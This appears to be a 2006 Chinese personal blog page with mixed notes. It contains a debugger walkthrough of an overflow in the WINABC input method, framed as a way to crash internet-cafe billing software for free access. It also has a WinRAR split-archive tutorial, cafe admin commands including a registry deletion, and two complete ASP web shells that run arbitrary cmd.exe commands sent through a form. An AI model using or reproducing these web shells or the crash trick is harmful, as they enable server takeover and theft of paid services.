7380AC81 |. 33DB       XOR EBX,EBX
…….
7380AE08 |> 0FB7C6       MOVZX EAX,SI                   ; Case 3 of switch 7380ACE2
7380AE0B |. 50         PUSH EAX
7380AE0C |. E8 340A0000   CALL WINABC.7380B845
7380AE11 |. 2BC3       SUB EAX,EBX
7380AE13 |. 74 26       JE SHORT WINABC.7380AE3B

…….
7380AE3B |> 381D 6C488173 CMP BYTE PTR DS:[7381486C],BL     ;DS:[7381486C]=2
7380AE41 |. 74 22       JE SHORT WINABC.7380AE65       ;没有发生跳转,正常情况下0×73811F52肯定大于0

7380AE43 |. 0FB705 521F817>MOVZX EAX,WORD PTR DS:[73811F52]   ;DS:[73811F52]为0
7380AE4A |. 48         DEC EAX                   ;FFFFFFFF
7380AE4B |. C605 CC758173 >MOV BYTE PTR DS:[738175CC],2    
7380AE52 |. 50         PUSH EAX
7380AE53 |. 68 561F8173   PUSH WINABC.73811F56
7380AE58 |. E8 FA140000   CALL WINABC.7380C357
7380AE5D |. 881D 6C488173 MOV BYTE PTR DS:[7381486C],BL     ;函数将发生错误
7380AE63 |. EB 31       JMP SHORT WINABC.7380AE96

如果del删去V,DS:[73811F52]变量为0,但是DS:[7381486C]=2没有变为0,仍然在输入中途状态,dec eax是为了取得除了v之外的字母串的长度,结果这里变为 0xffffffff,7380AE5D |. 881D 6C488173 MOV BYTE PTR DS:[7381486C],BL 中 函数没有做检查。

7380C4C8   0FB745 10     MOVZX EAX,WORD PTR SS:[EBP+10]         ; eax = 0xffff
7380C4CC   8BC8         MOV ECX,EAX
7380C4CE   8BFB         MOV EDI,EBX
7380C4D0   037B 58       ADD EDI,DWORD PTR DS:[EBX+58]
7380C4D3   03F3         ADD ESI,EBX
7380C4D5   8B75 0C       MOV ESI,DWORD PTR SS:[EBP+C]
7380C4D8   8BD1         MOV EDX,ECX
7380C4DA   C1E9 02       SHR ECX,2                       ; ecx = 0×3fff
7380C4DD   8943 54       MOV DWORD PTR DS:[EBX+54],EAX
7380C4E0   03C3         ADD EAX,EBX
7380C4E2   F3:A5         REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>   ; 拷贝0×3fff个int

看到了吗,出错的地方。在这里溢出了。
还有这个问题
7380B416 /$ 803D C0558173 >CMP BYTE PTR DS:[738155C0],0AA  
7380B41D |. 56         PUSH ESI
7380B41E |. 74 2D       JE SHORT WINABC.7380B44D
7380B420 |. 66:8B0D 545E81>MOV CX,WORD PTR DS:[73815E54]       ; cx = 0
7380B427 |. 66:49       DEC CX                     ; cx = 0xffff
7380B429 |. 0FB7C1       MOVZX EAX,CX
7380B42C |. 66:890D 545E81>MOV WORD PTR DS:[73815E54],CX
7380B433 |. 0FB690 405E817>MOVZX EDX,BYTE PTR DS:[EAX+73815E40]
7380B43A |. 0FB680 415E817>MOVZX EAX,BYTE PTR DS:[EAX+73815E41]

注:
ds:0×73815E54表示当前输入栏中有多少字/词 DS:[738129B0]=0时上面的代码会被用到。当用退格消去输入栏中最后一个汉字时DS:[73815E54]=0,DS:[738129B0]应该变成3,表示进入输入状态.但是我们随便输入一个词,然后输入任意字符,按"←",退格,回车,在输入框中得到前一词的默认字,然后连按两次退格。输入第一个退格键,DS:[73815E54]=1,可是DS:[738129B0]并没有变成3,再次按下退格键,函数又执行到这里,cx变为0xffff,就出错了。

因为程序可以导致IME所HOOK的进程退出。所以像万象那样的网吧管理软件会立刻出错而退出进程,这样你也就达到了免费上网的目的。

2006年03月21日

在WinRAR中也集成了分卷压缩的功能,而且它并不像WinZip那样必须在软盘的支持下才可以使用这个功能,在制作的时候能够将某个大文件分卷压缩存放在任意指定的盘符中,所以这也大大的方便了我们的使用。

(1)右击需要分卷压缩的文件或者是文件夹,在弹出的菜单中选择“添加到压缩包”选项。

(2)在弹出的设置窗口中,我们可以在“压缩包名称”对话框中确定文件存放的路径和名称,这时就可以将分卷压缩之后的文件存放在硬盘中的任何一个文件夹中。同时在“压缩方式”下拉列表中选择采用何种方式进行压缩,建议大家采用“最好”方式,这样能够让WinRAR最大程度的压缩文件。
此外,下部的压缩卷大小对话框可以设置每一个压缩包的个头大小。其中WinRAR默认的是1.44M软盘模式,不过你也可以定义压缩包大小,比如将其改变为1,024,000字节或者是由系统自动检测,这样当某一张软盘中已经存有文件的时候,WinRAR能够根据可用的磁盘空间来自动调整压缩包的大小。

(3)根据实际需要选择存档选项,比如能够直接将文件保存为自解压方式的EXE文件、设置身份验证信息、压缩完毕后删除原先的文件等等。
这样我们就可以得到以定义好的文件名为前缀,rar、r01、r02…之类为后缀名的文件,将它们复制到软盘中就可以了。至于合并这些文件也非常简单,只要将所有的分卷压缩文件复制到一个文件夹中,然后右击*.rar的文件,并选择“解压缩文件”命令即可。由于这种合并方式并不要求按照一定的次序插入软盘,所以即使软盘次序颠倒了也不会有任何影响。

具体操作是这样的:在进行数据备份或大文件交换时,通常采取用压缩软件分卷压缩到软盘上的办法,而在复原的时候则需要用到该压缩软件,否则这些压缩文件便无法复原。WinRAR开了生成分卷自解压文件的先河,制作的分卷压缩文件,离开WinRAR照用不误!

首先在主界面中选定欲压缩的文件夹或文件,单击鼠标右键,从快捷菜单中选“Add to Archive”命令,出现小窗口,先将压缩文档名称填入,需要带路径(如A:\文件名)。然后从容量(Volume size)下拉菜单中选择与软盘对应的数值。有360KB、720KB、1.2MB、1.44MB、2.88MB和自动检测六个备选项,也可以输入自己设定的数值。在文档选项区内选中“自解压”(SFX archive)方式,最后单击[OK],则开始进行分卷压缩,生成的第一个文件扩展名为.exe,第二个文档扩展名为.r00,第三个为.r01,依此类推。复原时,

0.\\192.168.0.253\12\qd\realtek_rtl8139_drv635whql\LanSetup_v1.80.635.051018\WinX64

;网吧文件备份

1.资料整合

copy /b *.txt 1.txt

2.批量更改扩展名

ren *.0* *.txt

3.删除主键

REGEDIT4

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

;会一并删除主键下所有,慎用

;regedit /s 1.reg 安静模式

3.检查系统文件

sfc /scannow

安装盘,要修改如下路径

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"DriverCachePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,\
  6f,00,74,00,25,00,5c,00,44,00,72,00,69,00,76,00,65,00,72,00,20,00,43,00,61,\
  00,63,00,68,00,65,00,00,00
"BootDir"="C:\\"
"PrivateHash"=hex:53,7b,f2,4a,a5,1b,d5,29,00,88,02,85,4c,86,71,e1
"Installation Sources"=hex(7):43,00,3a,00,5c,00,33,00,30,00,31,00,50,00,4c,00,\
  71,9a,a8,52,5c,00,51,7f,27,54,5c,00,49,00,6e,00,66,00,5f,00,6d,00,65,00,26,\
  00,32,00,6b,00,26,00,78,00,70,00,00,00,47,00,3a,00,5c,00,44,00,52,00,56,00,\
  5c,00,57,00,49,00,4e,00,58,00,50,00,5f,00,53,00,50,00,32,00,5f,00,49,00,33,\
  00,38,00,36,00,5c,00,49,00,33,00,38,00,36,00,00,00,47,00,3a,00,5c,00,44,00,\
  52,00,56,00,5c,00,44,64,61,8c,34,59,71,9a,a8,52,5c,00,57,00,45,00,42,00,43,\
  00,4f,00,4d,00,30,00,36,00,30,00,37,00,5c,00,57,00,45,00,42,00,43,00,4f,00,\
  4d,00,30,00,36,00,30,00,37,00,00,00,43,00,3a,00,5c,00,31,00,5c,00,5a,00,53,\
  00,4d,00,43,00,5f,00,37,00,31,00,33,00,31,00,45,00,26,00,48,00,56,00,37,00,\
  31,00,33,00,31,00,52,00,26,00,4d,00,49,00,33,00,36,00,30,00,5f,00,34,00,2e,\
  00,32,00,2e,00,31,00,31,00,32,00,36,00,2e,00,37,00,32,00,28,00,32,00,29,00,\
  00,00,47,00,3a,00,5c,00,44,00,52,00,56,00,5c,00,44,64,61,8c,34,59,71,9a,a8,\
  52,5c,00,44,64,cf,50,34,59,07,4e,fd,80,71,9a,a8,52,5c,00,e0,65,d8,76,44,64,\
  cf,50,34,59,07,4e,fd,80,71,9a,a8,52,00,00,44,00,3a,00,5c,00,44,00,52,00,56,\
  00,5c,00,f0,58,61,53,71,9a,a8,52,5c,00,52,00,45,00,41,00,4c,00,54,00,45,00,\
  4b,00,5f,00,41,00,4c,00,43,00,36,00,35,00,30,00,5f,00,33,00,36,00,39,00,5c,\
  00,57,00,44,00,4d,00,00,00,45,00,3a,00,5c,00,4c,00,41,00,4e,00,5c,00,52,00,\
  45,00,41,00,4c,00,54,00,45,00,4b,00,5c,00,52,00,54,00,4c,00,41,00,4e,00,53,\
  00,45,00,54,00,55,00,50,00,5c,00,57,00,49,00,4e,00,58,00,50,00,00,00,44,00,\
  3a,00,5c,00,44,00,52,00,56,00,5c,00,3e,66,61,53,71,9a,a8,52,5c,00,37,00,31,\
  00,2e,00,38,00,34,00,4e,00,56,00,49,00,44,00,49,00,41,00,5f,00,58,00,50,00,\
  32,00,4b,00,5f,00,49,00,4e,00,54,00,45,00,52,00,4e,00,41,00,54,00,49,00,4f,\
  00,4e,00,41,00,4c,00,5f,00,57,00,48,00,51,00,4c,00,5c,00,57,00,49,00,4e,00,\
  58,00,50,00,5f,00,32,00,4b,00,28,00,37,00,31,00,2e,00,38,00,34,00,29,00,00,\
  00,44,00,3a,00,5c,00,44,00,52,00,56,00,5c,00,57,00,49,00,4e,00,58,00,50,00,\
  5f,00,53,00,50,00,32,00,5f,00,49,00,33,00,38,00,36,00,5c,00,49,00,33,00,38,\
  00,36,00,00,00,45,00,3a,00,5c,00,71,9a,a8,52,0b,7a,8f,5e,5c,00,3e,66,61,53,\
  71,9a,a8,52,5c,00,4e,00,56,00,49,00,44,00,49,00,41,00,37,00,31,00,2e,00,38,\
  00,34,00,00,00,45,00,3a,00,5c,00,00,00,00,00
"SourcePath"="E:\\"
"ServicePackSourcePath"="E:\\"
"CDInstall"=dword:00000001

4.打开无主文件

管理员,资管/工具/文件夹选项/查看/取消“使用简单文件共享”。

右击文件/属性/安全/高级/所有者/将所有者更改为,替换…审核

3.NTFS比率

0~512M,512B

513~1G,1K

1025~2G,2KB

2049~…,4KB

4.虚拟内存

不可设在系统盘,要设置在NTFS中,物理的1.5倍,固定大小,不在同一硬盘

5.arp -A

;查看网吧资源

2006年03月18日
免FSO的CMD.ASP带回显
 
免FSO的CMD.ASP带回显1。
<%@codepage=936%><%On Error Resume Next
if Request("ad")<>"" then response.status="401 not Authorized"
Set z=Server.CreateObject("WSCRIPT.SHELL")
T=Server.mappath("lp"&year(date)&Session.SessionID&".txt")
sz=Request("Ck")
If sz=""Then sz="set"
z.Run "%COMSPEC% /c^"&sz&">"&T,0,True
Response.Write "<FORM method=POST><input type=text name=Ck value=’"&sz&"’> <input type=submit value=Run> <input type=reset value=RESET> <input type=submit name=ad title=PasswordWantted value=RunAsAdmin></FORM><br>执行了["&sz&"] ["&T&"]<Iframe src=’lp"&year(date)&Session.SessionID&".txt’ width=99% height=99% frameborder=0></iframe>"
response.flush
for i=1 to 1800000
ys=9+9
next
z.run "%COMSPEC% /c echo Y│del "&T,1,True
set z=Nothing%>

免FSO的CMD.ASP带回显2。
<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>